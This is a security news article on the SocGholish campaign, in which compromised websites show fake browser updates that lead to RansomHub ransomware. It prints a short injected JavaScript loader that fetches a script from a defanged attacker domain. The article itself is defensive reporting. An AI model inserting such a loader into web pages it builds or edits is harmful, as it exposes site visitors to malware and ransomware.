SocGholish Leveraging Compromised Websites To Deploy RansomHub Ransomware

The cybersecurity landscape has witnessed a concerning development as threat actors behind SocGholish have begun weaponizing compromised websites to distribute the dangerous RansomHub ransomware.

This sophisticated attack chain involves multiple stages of deception, beginning with legitimate websites that have been infiltrated and modified to serve malicious JavaScript to unsuspecting visitors.

SocGholish, a notorious JavaScript-based malware framework, typically masquerades as browser updates to trick users into downloading malicious payloads.

The campaign uses compromised websites as initial infection vectors, creating a widespread distribution network that’s difficult to detect and mitigate.

The infection begins when users visit these legitimate but compromised websites, which then display fake browser update notifications.

Trend Micro Security researchers identified this evolving threat campaign targeting organizations across multiple sectors, with a particular focus on healthcare, finance, and manufacturing industries.

Their analysis revealed that the threat actors have enhanced their techniques to evade detection while expanding their ransomware deployment capabilities.

The newly observed attack chain now culminates in the deployment of RansomHub ransomware, a relatively new but increasingly prevalent ransomware variant that implements strong encryption algorithms and sophisticated evasion techniques.

Once executed, RansomHub encrypts files across local and network drives, demanding cryptocurrency payments for decryption keys.

Investigation of the compromised websites revealed injected obfuscated JavaScript code, typically inserted near the end of legitimate JavaScript files or directly into HTML content.

Attack Chain

The infection sequence begins with compromised websites containing injected JavaScript code that evaluates the visitor’s browser environment.

The malicious code snippet resembles:-

(function(){
    var d = document;
    var s = d.createElement('script');
    s.src = 'https://compromised-cdn[.]com/updater.js';
    d.getElementsByTagName('head')[0].appendChild(s);
})();

This innocuous-looking code loads additional scripts from attacker-controlled domains.

The second-stage JavaScript performs extensive environment checks to avoid detection in sandboxes or analysis environments.

Browser fingerprinting techniques determine if the victim uses Chrome, Firefox, or Edge before displaying the appropriate fake update notification.

When users interact with these fake update notices, they download a ZIP file containing a malicious JavaScript file.

This file, when executed, establishes persistence through scheduled tasks and registry modifications before retrieving the RansomHub payload from command-and-control servers.

The ransomware payload itself utilizes sophisticated techniques including process hollowing and API unhooking to bypass security solutions.

The infection culminates in file encryption and the delivery of a ransom note demanding payment for file recovery.

Security experts recommend implementing robust web filtering solutions, keeping browsers updated, and training users to recognize fake update notifications as critical mitigation strategies against this evolving threat.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.

The post SocGholish Leveraging Compromised Websites To Deploy RansomHub Ransomware appeared first on Cyber Security News.